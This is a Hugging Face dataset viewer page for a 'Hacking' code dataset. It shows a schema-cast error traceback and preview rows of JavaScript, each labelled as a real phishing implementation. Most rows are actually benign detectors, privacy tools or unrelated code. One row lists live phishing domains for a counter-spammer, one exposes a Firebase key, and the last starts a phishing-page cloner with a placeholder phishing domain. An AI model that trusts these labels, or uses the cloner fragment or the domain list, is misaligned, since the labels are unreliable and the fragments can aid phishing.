The full dataset viewer is not available (click to read why). Only showing a preview of the rows.
The dataset generation failed because of a cast error
Error code: DatasetGenerationCastError
Exception: DatasetGenerationCastError
Message: An error occurred while generating the dataset
All the data files must have the same columns, but at some point there are 2 new columns ({'columns', 'total_samples'}) and 7 missing columns ({'repo_name', 'problem_title', 'task', 'language', 'split', 'sample_solution', 'problem_description'}).
This happened while the json dataset builder was generating data using
hf://datasets/Basti1110/Hacking/code_dataset_20250522_220104_report.json (at revision 36d694e1dbaf2fc62705098547923b6116dfa64a)
Please either edit the data files to have matching columns, or separate them into different configurations (see docs at https://hf.co/docs/hub/datasets-manual-configuration#multiple-configurations)
Traceback: Traceback (most recent call last):
File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/builder.py", line 1871, in _prepare_split_single
writer.write_table(table)
File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/arrow_writer.py", line 643, in write_table
pa_table = table_cast(pa_table, self._schema)
File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/table.py", line 2293, in table_cast
return cast_table_to_schema(table, schema)
File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/table.py", line 2241, in cast_table_to_schema
raise CastError(
datasets.table.CastError: Couldn't cast
total_samples: int64
columns: list<item: string>
child 0, item: string
timestamp: string
to
{'task': Value(dtype='string', id=None), 'problem_title': Value(dtype='string', id=None), 'problem_description': Value(dtype='string', id=None), 'sample_solution': Value(dtype='string', id=None), 'language': Value(dtype='string', id=None), 'repo_name': Value(dtype='string', id=None), 'timestamp': Value(dtype='timestamp[ns]', id=None), 'split': Value(dtype='string', id=None)}
because column names don't match
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/src/services/worker/src/worker/job_runners/config/parquet_and_info.py", line 1433, in compute_config_parquet_and_info_response
parquet_operations = convert_to_parquet(builder)
File "/src/services/worker/src/worker/job_runners/config/parquet_and_info.py", line 1050, in convert_to_parquet
builder.download_and_prepare(
File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/builder.py", line 925, in download_and_prepare
self._download_and_prepare(
File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/builder.py", line 1001, in _download_and_prepare
self._prepare_split(split_generator, **prepare_split_kwargs)
File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/builder.py", line 1742, in _prepare_split
for job_id, done, content in self._prepare_split_single(
File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/builder.py", line 1873, in _prepare_split_single
raise DatasetGenerationCastError.from_cast_error(
datasets.exceptions.DatasetGenerationCastError: An error occurred while generating the dataset
All the data files must have the same columns, but at some point there are 2 new columns ({'columns', 'total_samples'}) and 7 missing columns ({'repo_name', 'problem_title', 'task', 'language', 'split', 'sample_solution', 'problem_description'}).
This happened while the json dataset builder was generating data using
hf://datasets/Basti1110/Hacking/code_dataset_20250522_220104_report.json (at revision 36d694e1dbaf2fc62705098547923b6116dfa64a)
Please either edit the data files to have matching columns, or separate them into different configurations (see docs at https://hf.co/docs/hub/datasets-manual-configuration#multiple-configurations)Need help to make the dataset viewer work? Make sure to review how to configure the dataset viewer, and open a discussion for direct support.
task
string | problem_title
string | problem_description
string | sample_solution
string | language
string | repo_name
string | timestamp
timestamp[us] | split
string |
|---|---|---|---|---|---|---|---|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
/* Author: Selvahini Kamalarajan
Date: December 5, 2023
File Name: script
Description: Informational website about the implications of privacy and information technology usage */
function phishing() {
// Function to display correct answer for phishing email question
var question = document.quiz2.question.value;
if (question == "yes") {
document.getElementById("message").innerHTML = "Correct! This is a spoof email coming from a fake sender address (i.e. 'myuniversity.edu') and redirects the user to a bogus page that appears to be legitimate.";
}
if (question == "no") {
document.getElementById("message").innerHTML = "Incorrect. This is a spoof email coming from a fake sender address (i.e. 'myuniversity.edu') and redirects the user to a bogus page that appears to be legitimate. Your privacy can be compromised due to malicious script activities.";
}
document.getElementById("after_submit").style.visibility = "visible"; //Set element visibility to visible
}
function check() {
// Function to check answers for Privacy Policy Question
var question = document.quiz.question.value;
// Output message and picture if user answers yes/no
if (question == "yes") {
document.getElementById("message").innerHTML = "Nice! You are one of 9% of people who read privacy policies often.";
document.getElementById("picture").src = "policy.png";
}
if (question == "no") {
document.getElementById("message").innerHTML = "Just like you, 91% of consumers accept the terms and conditions without reading them.";
document.getElementById("picture").src = "policies-stats.jpg";
}
document.getElementById("after_submit").style.visibility = "visible";
}
function checkAns() {
// Function to check answers for quiz
var correctAns = ["b", "b", "a", "d", "b", "d", "b", "b", "c", "d"];
var correct = 0;
var questions = [document.quiz.q1.value, document.quiz.q2.value, document.quiz.q3.value, documen
|
Javascript
|
selvxhini-10/PersonalPrivacyWebsite
| 2025-05-22T22:01:00.115000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
//
/******************************************************************************
* user.js *
* https://github.com/pyllyukko/user.js *
******************************************************************************/
/******************************************************************************
* SECTION: HTML5 / APIs / DOM *
******************************************************************************/
// PREF: Disable Service Workers
// https://developer.mozilla.org/en-US/docs/Web/API/Worker
// https://developer.mozilla.org/en-US/docs/Web/API/ServiceWorker_API
// https://wiki.mozilla.org/Firefox/Push_Notifications#Service_Workers
// NOTICE: Disabling ServiceWorkers breaks functionality on some sites (Google Street View...)
// NOTICE: Disabling ServiceWorkers breaks Firefox Sync
// Unknown security implications
// CVE-2016-5259, CVE-2016-2812, CVE-2016-1949, CVE-2016-5287 (fixed)
user_pref("dom.serviceWorkers.enabled", false);
// PREF: Disable web notifications
// https://support.mozilla.org/en-US/questions/1140439
user_pref("dom.webnotifications.enabled", false);
// PREF: Disable DOM timing API
// https://wiki.mozilla.org/Security/Reviews/Firefox/NavigationTimingAPI
// https://www.w3.org/TR/navigation-timing/#privacy
// NOTICE: Disabling DOM timing API breaks item pages in AliExpress (https://github.com/pyllyukko/user.js/issues/561)
user_pref("dom.enable_performance", false);
// PREF: Disable resource timing API
// https://www.w3.org/TR/resource-timing/#privacy-security
// NOTICE: Disabling resource timing API breaks some DDoS protection pages (Cloudflare)
user_pref("dom.enable_resource_timing", false);
// PREF: Make sure the User Timing API does not provide a new high resolution timestamp
// https://trac.torproject.org/projects/tor/ticket/16336
// https://www.w3.org/TR/2013/REC-user-timing-2
|
Javascript
|
pyllyukko/user.js
| 2025-05-22T22:01:00.249000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
export class PhishingDetector {
constructor() {
// No need to check for ai.languageModel here
// We'll handle capability checks when we use the model
}
async calculateScore(emailContent) {
try {
// Log emailContent for debugging
console.log('Email content received:', emailContent);
const features = this.analyzeEmailFeatures(emailContent);
// Check if the language model is available
const capabilities = await ai.languageModel.capabilities();
if (capabilities.available !== "readily") {
console.warn('Language model is not readily available');
if (capabilities.consent === "granted") {
console.log('Consent already granted.');
} else if (capabilities.consent === "requirable") {
// Request user consent
const consentResult = await ai.languageModel.requestConsent();
if (!consentResult) {
console.warn('User did not grant consent');
return 50; // Return a default score or handle accordingly
} else {
console.log('User granted consent.');
}
} else {
console.warn('Consent is not available.');
return 50; // Return a default score or handle accordingly
}
}
// Generate the prompt
const prompt = `
Instructions:
- Considering the above information, assign a phishing likelihood score and provide a detailed explanation.
- Use English and Arabic numerals.
- Return the result in the format "The score is the following: X", where X is a number between 0 and 100.
Analyze this email for phishing indicators and provide a response in the following format:
The score is the following: X
The explanation is: [Your detailed analysis here]
End of explanation.
Consider these factors:
- Urgency or pressure tactics
- Grammar and spelling errors
- Suspicious links or attachments
- Requests for sensitive information
- Mismatched or fake sender addresses
- Time sent
|
Javascript
|
Dalosuuu/GmailPhishGuardian_AI
| 2025-05-22T22:01:00.434000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
'use strict'
const chromeLauncher = require('chrome-launcher')
const path = require('path')
// Borrow from here:
// https://github.com/GoogleChrome/puppeteer/blob/master/lib/Launcher.js#L30
const DEFAULT_ARGS = [
'--disable-background-networking',
'--disable-background-timer-throttling',
'--disable-client-side-phishing-detection',
'--disable-default-apps',
'--disable-hang-monitor',
'--disable-popup-blocking',
'--disable-prompt-on-repost',
'--disable-sync',
'--enable-automation',
'--enable-devtools-experiments',
'--metrics-recording-only',
'--no-first-run',
'--password-store=basic',
'--safebrowsing-disable-auto-update',
'--use-mock-keychain',
]
// borrow from: http://qiita.com/saekis/items/c2b41cd8940923863791
function escapeHtml (string) {
if (typeof string !== 'string') {
return string
}
return string.replace(/[&'`"<>]/g, function (match) {
return {
'&': '&',
'\'': ''',
'`': '`',
'"': '"',
'<': '<',
'>': '>',
}[match]
})
}
function escapeSingleQuote (string) {
if (typeof string !== 'string') {
return string
}
return string.replace(/'/g, '\\\'')
}
function escapeNewLine (string) {
return string.replace(/\r?\n/g, '\\n')
}
async function createChromeLauncher (startingUrl, options) {
const flags = [].concat(DEFAULT_ARGS)
let chromeInstance
// Lighthouse adds '--disable-setuid-sandbox' flag automatically.
// The flag causes an error on linux when staring headless chrome.
// '--no-sandbox' suppresses an error caused by '--disable-setuid-sandbox'.
if (process.platform === 'linux') {
flags.push('--no-sandbox')
}
if (!options.visible) {
flags.push('--headless')
flags.push('--hide-scrollbars')
flags.push('--mute-audio')
}
if (options.chromeFlags && Array.isArray(options.chromeFlags)) {
options.chromeFlags.forEach(f => {
if (f.indexOf('--') === -1) {
throw new Error('An item of chromFlags option
|
Javascript
|
OnetapInc/chromy
| 2025-05-22T22:01:00.573000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
// eslint-disable-next-line no-undef
docute.init({
debug: true,
title: 'Spam Scanner',
repo: 'spamscanner/spamscanner',
'edit-link': 'https://github.com/spamscanner/spamscanner/tree/master/',
twitter: 'niftylettuce',
nav: {
default: [
{
title:
'The best anti-spam, email filtering, and phishing prevention service.',
path: '/'
}
]
},
// eslint-disable-next-line no-undef
plugins: [docuteEmojify()]
});
|
Javascript
|
spamscanner/spamscanner
| 2025-05-22T22:01:00.710000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
// this is the code which will be injected into a given page...
var config = {
apiKey: "AIzaSyD1FfiwIWzbbn0rhqQg6ZF2KzVBOiqU7oQ",
authDomain: "phish-ai-production.firebaseapp.com",
databaseURL: "https://phish-ai-production.firebaseio.com",
projectId: "phish-ai-production",
storageBucket: "gs://phish-ai-production.appspot.com/",
messagingSenderId: "976092427021"
};
firebase.initializeApp(config);
var db = firebase.firestore();
function open_options_page() {
chrome.tabs.create({'url': "/options.html" } )
};
function open_demo_page() {
chrome.tabs.create({'url': "https://www.phish.ai/request-a-demo" } )
};
function restore_popup() {
chrome.storage.local.get({
idnEnable: true,
aiEnable: true
}, function(items) {
if (!items.aiEnable) {
document.getElementById('zero_day_disabled').style.display = ""
}
if (!items.idnEnable) {
document.getElementById('idn_disabled').style.display = ""
}
var bg = chrome.extension.getBackgroundPage();
var query = {active: true, currentWindow: true};
chrome.tabs.query(query, function callback(tabs) {
if (items.idnEnable) {
var currentTab = tabs[0]; // there will be only one in this array
var hostname = bg.extractHostname(currentTab.url);
var domain = document.getElementById('domain');
var idn_status = document.getElementById('idn_status');
if (bg.isDomainIDN(hostname)) {
domain.className = 'badge badge-danger';
idn_status.className = 'badge badge-danger';
idn_status.innerHTML = 'IDN Detected';
}
domain.innerHTML = hostname;
}
if (items.aiEnable) {
if (currentTab.id in bg.tabMalicious) {
var zero_day = document.getElementById('zero_day');
var ta
|
Javascript
|
phishai/phish-protect
| 2025-05-22T22:01:00.830000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
respecConfig.localBiblio = {
"aicaptcha": {
"title": "aiCaptcha: Using AI to beat CAPTCHA and post comment spam",
"date": "",
"authors": ["Casey Chesnut"],
"editors": [],
"etAl": false,
"publisher": "",
"href": "http://www.brains-n-brawn.com/default.aspx?vDir=aicaptcha"
},
"able-gamers": {
"title": "Thought On Accessibility and VR",
"date": "March, 2017",
"authors": ["AJ Ryan"],
"editors": [],
"etAl": false,
"publisher": "",
"href": "https://ablegamers.org/thoughts-on-accessibility-and-vr/"
},
"antiphishing": {
"title": "Phishing Activity Trends Report",
"date": "July, 2005",
"authors": [],
"editors": [],
"etAl": false,
"publisher": "Anti-Phishing Working Group",
"href": "http://antiphishing.org/APWG_Phishing_Activity_Report_Jul_05.pdf"
},
"breaking": {
"title": "Breaking CAPTCHAs Without Using OCR",
"date": "",
"authors": ["Howard Yeend"],
"editors": [],
"etAl": false,
"publisher": "",
"href": "http://www.cs.berkeley.edu/%7Emori/gimpy/gimpy.html"
},
"breakingocr": {
"title": "Breaking CAPTCHAs Without Using OCR",
"date": "",
"authors": ["Howard Yeend"],
"editors": [],
"etAl": false,
"publisher": "",
"href": "http://www.puremango.co.uk/cm_breaking_captcha_115.php"
},
"chafee": {
"title": "17 USC 121, Limitations on exclusive rights: reproduction for blind or other people with disabilities (also known as the Chafee Amendment)",
"date": "",
"authors": [],
"editors": [],
"etAl": false,
"publisher": "",
"href": "https://www.copyright.gov/title17/92chap1.html"
},
"captcha-ocr": {
"title": "CAPTCHA: Attacks and Weaknesses against OCR technology",
"date": "2013",
"authors": [
"Silky Azad", "Kiran Jain"],
"publisher": "Journal of Computer science and Technology",
"etAl": false,
"editors": [],
"href": "https://computerresearch.org/index.php/computer/article/download/368/368"
},
"information-security": {
"ti
|
Javascript
|
w3c/apa
| 2025-05-22T22:01:01.006000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
'use strict';
const fs = require('fs-extra');
const debug = require('debug')('app');
const express = require('express');
const csp = require('express-csp-header');
const frameguard = require('frameguard');
const xssFilter = require('x-xss-protection');
const bodyParser = require('body-parser');
const url = require('url');
const dateFormat = require('dateformat');
const {fork} = require('child_process');
const download = require('download-file');
const rimraf = require('rimraf');
const phishingDetector = require('eth-phishing-detect/src/detector');
const crypto = require("crypto");
const request = require('request');
const app = express();
const config = require('./config');
const check = require('./_utils/webcheck.js');
const lookup = require('./_utils/lookup.js');
let default_template = fs.readFileSync('./_layouts/default.html', 'utf8');
let cache;
let updating_now = false;
let icon_warnings = [];
var older_cache_time;
if('perform_dns_lookup' in config && config.perform_dns_lookup === false) {
default_template = default_template.replace("{{ config.perform_dns_lookup }}", "<div class='ui info message'>DNS lookups not performed due to configuration.</div><br />");
} else {
default_template = default_template.replace("{{ config.perform_dns_lookup }}", '');
}
/* See if there's an up-to-date cache, otherwise run `update.js` to create one. */
function getCache(callback = false) {
if (!fs.existsSync('_cache/cache.json')) {
debug("No cache file found. Creating one...");
if (callback) {
if (!updating_now) {
updating_now = true;
fork('update.js');
}
var checkDone = setInterval(function() {
if (fs.existsSync('_cache/cache.json')) {
updating_now = false;
cache = JSON.parse(fs.readFileSync('_cache/cache.json'));
clearInterval(checkDone);
debug("Successfully updated cache!");
|
Javascript
|
MrLuit/EtherScamDB
| 2025-05-22T22:01:01.099000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
/**
* Github
* https://github.com/6IX7ine/certstreamcatcher
*
* Copyright (c) 2017 Fábio Castro
* Licensed under the MIT license.
*/
'use strict'
const tld = require('tldjs');
const lodash = require('lodash');
const color = require('cli-color');
const status = require('node-status');
const punycode = require('punycode');
const yellow = color.yellow.underline;
const danger = color.redBright.underline;
const white = color.white.underline;
const certificates = status.addItem('certificates');
const mapping = {
"a": ["à", "á", "â", "ã", "ä", "å", "ā", "ă", "ą", "ǎ", "ȁ", "ȃ", "ȧ", "ḁ", "ẚ", "ạ"],
"b": ["ḃ", "ḅ", "ḇ", "ƀ"],
"c": ["ç", "ć", "ĉ", "ċ", "č"],
"d": ["ḋ", "ḍ", "ḏ", "ḑ", "ḓ", "đ"],
"e": ["è", "é", "ê", "ë", "ĕ", "ė", "ę", "ě", "ȅ", "ȇ", "ȩ", "ḙ", "ḛ", "ẹ", "ẽ"],
"f": ["ḟ"],
"g": ["ĝ", "ğ", "ġ", "ģ", "ǧ", "ǵ", "ḡ"],
"h": ["ĥ", "ȟ", "ḣ", "ḥ", "ḧ", "ḩ", "ḫ", "ẖ"],
"i": ["ì", "í", "î", "ï", "ĩ", "ī", "ĭ", "į", "ǐ", "ȉ", "ȋ", "ḭ", "ị"],
"j": ["ĵ", "ǰ"],
"k": ["ķ", "ǩ", "ḱ", "ḳ", "ḵ"],
"l": ["ĺ", "ļ", "ľ", "ŀ", "ḷ", "ḻ", "ḽ", "ι", "ł"],
"m": ["ḿ", "ṁ", "ṃ", "ϻ"],
"n": ["ñ", "ń", "ņ", "ň", "ʼn", "ǹ", "ṅ", "ṇ", "ṉ", "ṋ"],
"o": ["ò", "ó", "ô", "õ", "ö", "ō", "ŏ", "ő", "ơ", "ǒ", "ǫ", "ố", "ȍ", "ȏ", "ȯ", "ọ", "ø", "ộ"],
"p": ["ṕ", "ṗ", "ϸ"],
"r": ["ŕ", "ŗ", "ř", "ȑ", "ȓ", "ṙ", "ṛ", "ṟ", "ґ"],
"s": ["ŝ", "ş", "š", "ș", "ṡ", "ṣ"],
"t": ["ţ", "ť", "ț", "ṫ", "ṭ", "ṯ", "ṱ", "ẗ"],
"u": ["ù", "ú", "û", "ü", "ũ", "ū", "ŭ", "ů", "ű", "ų", "ư", "ǔ", "ȕ", "ȗ", "ṳ", "ṵ", "ṷ", "ụ"],
"v": ["ṽ", "ṿ"],
"w": ["ŵ", "ẁ", "ẃ", "ẅ", "ẇ", "ẉ", "ẘ"],
"x": ["ẋ", "ẍ"],
"y": ["ý", "ÿ", "ŷ", "ȳ", "ẏ", "ẙ", "ỳ", "ỵ", "ỹ"],
"z": ["ź", "ż", "ž", "ẑ", "ẓ", "ẕ"]
}
module.exports = {
certstreamClientPhishing: function (certstream, regex, tlds, options) {
this.certstream = certstream;
this.regex = regex;
this.tlds = tlds;
let settings = { tlds: false };
if (!op
|
Javascript
|
jimywork/certstreamcatcher
| 2025-05-22T22:01:01.244000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
// Redirecting to links from the book:
// https://nooffice.link/REDIRECT
// which translates to https://nooffice.org/redirect?to=REDIRECT
let links = new Map([
//list of REDIRECT links
['nooffice', 'https://nooffice.org'],
//chapter 19
['ocr', 'https://en.wikipedia.org/wiki/Optical_character_recognition'],
['evernote','https://Evernote.com'],
['swiftscan', 'https://swiftscan.app/en/index.html'],
['ios-scan', 'https://support.apple.com/en-us/HT210336'],
['dropbox', 'https://www.dropbox.com'],
['box', 'https://box.com'],
['gdrive', 'https://drive.google.com'],
['onedrive', 'https://www.microsoft.com/en-us/microsoft-365/onedrive/online-cloud-storage'],
['iwork', 'https://www.apple.com/iwork/'],
['gsheets', 'https://www.google.com/sheets/about/'],
['excel', 'https://www.microsoft.com/en-us/microsoft-365/excel'],
['mfa', 'https://en.wikipedia.org/wiki/Multi-factor_authentication'],
['messages', 'https://support.apple.com/explore/messages'],
['signal', 'https://www.signal.org'],
['telegram', 'https://telegram.org'],
['whatsapp', 'https://www.whatsapp.com'],
['ipadonly', 'https://ipadonly.com/book/'],
['vpn', 'https://en.wikipedia.org/wiki/Virtual_private_network'],
['github', 'https://nooffice.org/why-in-any-company-you-should-be-using-version-control-for-anything-how-we-use-github-not-only-bc2554308455/'],
//chapter 20
['conversation', 'https://en.wikipedia.org/wiki/A_Little_Less_Conversation'],
['slack', 'https://slack.com'],
['msteams', 'https://www.microsoft.com/en-us/microsoft-365/microsoft-teams/group-chat-software'],
['cognitive', 'https://www.pnas.org/content/106/37/15583'],
['digital-minimalism', 'https://www.calnewport.com/books/digital-minimalism/'],
//chapter 21
['offices', 'https://sliwinski.com/tag/office'],
['cabinet', 'https://sliwinski.com/declutter-your-desk-why-i-love-my-clutter-fre/'],
['stand', 'https://michael.team/myoffice/'],
['whiteboard', 'https://sliwinski.com/whiteboard/'],
//chapter 22
//chapter 23
['basecamphires', 'https://m.signa
|
Javascript
|
Nozbe/NoOffice.org
| 2025-05-22T22:01:01.359000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
/* OpenID for node.js
*
* http://ox.no/software/node-openid
* http://github.com/havard/node-openid
*
* Copyright (C) 2010 by Håvard Stranden
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
*
* -*- Mode: JS; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*-
* vim: set sw=2 ts=2 et tw=80 :
*/
const { access } = require('fs');
var Buffer = require('buffer').Buffer,
crypto = require('crypto'),
http = require('./http'),
querystring = require('querystring'),
url = require('url'),
xrds = require('./lib/xrds');
var _associations = {};
var _discoveries = {};
var _nonces = {};
var AX_MAX_VALUES_COUNT = 1000;
var openid = exports;
var _get = http.get;
var _post = http.post;
function hasOwnProperty(obj, prop) {
return Object.prototype.hasOwnProperty.call(obj, prop);
}
openid.RelyingParty = function (returnUrl, realm, stateless, strict, extensions) {
this.returnUrl = returnUrl;
this.realm = realm || null;
this.stateless = stateless;
this.str
|
Javascript
|
havard/node-openid
| 2025-05-22T22:01:01.483000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
//If container already in DOM, remove it
if(report.length > 0) report.remove();
//Container report
/*report = $('<div id="report">\
<textarea id="reportv" maxlength="150" placeholder="Attention, les signalements abusifs, sans intérêt ou encore pour dire merci seront passible de sanction allant d\'un simple avertissement au ban."></textarea>\
</div>');*/
body.append('<div id=report> </div>');
report = cacheSel('#report');
//Container, select subject / textarea
report.html('<p>Selectionner le sujet de votre signalement</p>\
<ul>\
<li id=reDead><i class="fa fa-unlink"> Liens morts</i></li>\
<li id=reForb><i class="fa fa-ban"> Hors charte</i></li>\
<li id=reMove><i class="fa fa-share"> A déplacer</i></li>\
<li id=reSecu><i class="fa fa-crosshairs"> Virus/Trojan/Scam...</i></li>\
<li id=reHate><i class="fa fa-globe"> Insulte envers un peuple/religion/minorité...</i></li>\
<li id=rePers><i class="fa fa-eye-slash"> Violation vie privée</i></li>\
<li id=reProt><i class="fa fa-child"> Contenu pédophile</i></li>\
<li id=reOthr><i class="fa fa-random"> Réouverture, résolu, autres...</i></li>\
</ul>\
<textarea id=reportv placeholder="default"></textarea>');
//Refresh caching
report = cacheSel('#report');
reportv = cacheSel('#reportv');
//Hide the reportv until a subject get select
reportv.hide();
//Get 80% in px
var sizecal = $(window).width() * 0.8;
//Max width
if(parseInt(sizecal) > 600) var sizecal = 600;
//Pop the container vote
report.dialog({
width:sizecal,
modal:true,
resizable: true,
title:'Signalement',
dialogClass:'modalNinja',
show:{effect:'scale', duration: 320},
buttons: [{
text: 'Confirmation',
click: function() {
//Subject
reps = reportv.attr('class');
//Value textarea
rept = reportv.val();
//Less 10 chars return
if(rept.length < 10) {
coloredInput(reportv,'errorSe','Minimum 10 caractères');
return;
|
Javascript
|
Anyon3/ninjacms
| 2025-05-22T22:01:01.680000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
/**
* Created by IntelliJ IDEA.
* User: Altryne
* Date: Nov 20, 2010
* Time: 4:55:41 AM
* To change this template use File | Settings | File Templates.
*/
var intervall = 0;
can_run_apps = false,
folder_open = false,
tick = '',
doubleclickthreshhold = 200,
isDblClick = false,
canScroll = true,
active_app = '';
$('.page .delete,#dock .delete').live('click', function(event) {
event.stopPropagation();
event.stopImmediatePropagation();
if(confirm('Are you sure you want to delete this app from you iPad?')){
$(this).parent().css({'width':74,'height':99}).children('.delete, span').hide();
$(this).siblings('.app_logo')
.stop()
.css('position','absolute')
.animate({left:"50%",width:1,top:"50%",height: 1},'easeInQuint',function(){$(this).parent().remove()})
}
});
$('#multitask_bar .delete').live('mousedown ', function(event) {
event.stopPropagation();
event.stopImmediatePropagation();
$(this).parent().css({'width':74,'height':99}).children('.delete, span').hide();
$(this).siblings('.app_logo')
.stop()
.css('position','absolute')
.animate({left:"50%",width:1,top:"50%",height: 1},'easeInQuint',function(){
_id = $(this).parent().attr('id');
$('#'+_id+'_app').remove();
$(this).parent().remove();
if(!$('#multitask_bar li').length){
closeMultitask(200);
}
})
});
$('.page.apps>li,#dock li').live('mousedown mouseup', function(event) {
if (event.type == 'mousedown') {
$(this).addClass('mousedown');
if (!$('#drag').is('.ui-draggable-dragging') && !$('body').is('.editMode')) {
can_run_apps = true;
intervall = setTimeout(edit_mode, '1000');
}else if($(this).hasClass('folder') && $('body').is('.editMode')){
openFolder($(this).attr('id
|
Javascript
|
altryne/Ipad-Simulator
| 2025-05-22T22:01:01.825000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
/*
* Copyright (c) 2021, Atheropids. All rights reserved.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
'use strict';
const https = require('https');
const readline = require('readline');
const tough = require('tough-cookie');
// Spec holder class. Please see comments of member variables for details.
class PhishingServer {
constructor(__domain, __entry_path = '/', __login_page = '/home/login', __login_inbox = '/login/dologin') {
// Target C&C server domain name.
this.target_domain = __domain;
// Remote path for server cookie init.
this.entry_path = __entry_path;
// Remote path of the phishing page.
this.phishing_page_path = __login_page;
// Remote path of the phishing data receiver.
this.phishing_target_path = __login_inbox;
}
}
/*
* Settings are here c:
* Modify them on your purpose.
*/
// List of malicious servers.
let spam_targets = [
// [seized operation] new PhishingServer('steamcomrninuty.ru'),
// [seized operation] new PhishingServer('steamcommnunmity.com', '/id/zxayonax'),
// [seized operation] new PhishingServer('nitro-discord.ru', '/airdrop'),
// [seized operation] new PhishingServer('steamcommunity.link'),
// [seized operation] new PhishingServer('discorcl.link'),
new PhishingServer('steamcommmunilty.com', '/tradoffer/new/?partner=406482431&token=lfk938iK'),
new PhishingServer('discorrd.ru'),
new PhishingServer('free-nitroos.ru'),
new PhishingServer('discod.info', '/nitro-gift'),
new PhishingServer('d
|
Javascript
|
Atheropids/SteamComrninuty-Phish-Spammer
| 2025-05-22T22:01:02.005000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
module.exports = [
'2015',
'2016',
'2017',
'2018',
'2019',
'2020',
'abuse',
'academy',
'accessibility',
'account',
'accountant',
'accounting',
'accountmanager',
'accountmanagers',
'accounts',
'accountspayable',
'acquisition',
'admin',
'admin1',
'administracao',
'administracion',
'administrador',
'administratie',
'administratif',
'administration',
'administrativo',
'administrator',
'administrators',
'admins',
'adminteam',
'admissions',
'adops',
'ads',
'adventure',
'advertise',
'advertising',
'advertisingsales',
'advice',
'advisor',
'advisors',
'adwords',
'affiliate',
'affiliates',
'agence',
'agencia',
'agency',
'agents',
'alarm',
'alarms',
'alert',
'alerts',
'alexa',
'all',
'all-employees',
'all-pms',
'all-staff',
'all-team',
'all-users',
'all.employees',
'all.staff',
'all.users',
'all_staff',
'alla',
'alle',
'allemployees',
'allhands',
'allsales',
'allstaff',
'allstudents',
'allteachers',
'allteam',
'allusers',
'alpha',
'alphas',
'alumni',
'ambassadors',
'amministrazione',
'analysts',
'analytics',
'android',
'angels',
'animation',
'announce',
'announcements',
'ap',
'api',
'app',
'apple',
'application',
'applications',
'apply',
'appointments',
'apps',
'archives',
'asistente',
'asset',
'assistanthead',
'assistencia',
'assistenza',
'associates',
'associates-all',
'ateam',
'atencionalcliente',
'atendimento',
'auctions',
'available',
'backend',
'backend-dev',
'backup',
'bd',
'benefits',
'berlin',
'bestellung',
'beta',
'biblioteca',
'bibliotheque',
'billing',
'bills',
'biuro',
'biz',
'bizdev',
'blog',
'board',
'bod',
'bookclub',
'booking',
'bookings',
'boston',
'boxoffice',
'brand',
'branding',
'brands',
'brandsolutions',
'broadcast',
'buchhaltung',
'bugs',
'build',
'bursar',
'busdev',
'business',
|
Javascript
|
decal/werdlists
| 2025-05-22T22:01:02.114000
|
training
|
code_generation
|
phishing in Javascript
|
Real implementation of phishing in Javascript fetched from GitHub.
|
page_src = "https://login.vulnwebsite.com/";
phishing_url="http://yourphishingdomain.com/";
function doHTMLMagic(pageSource, baseURL, phishDomain) {
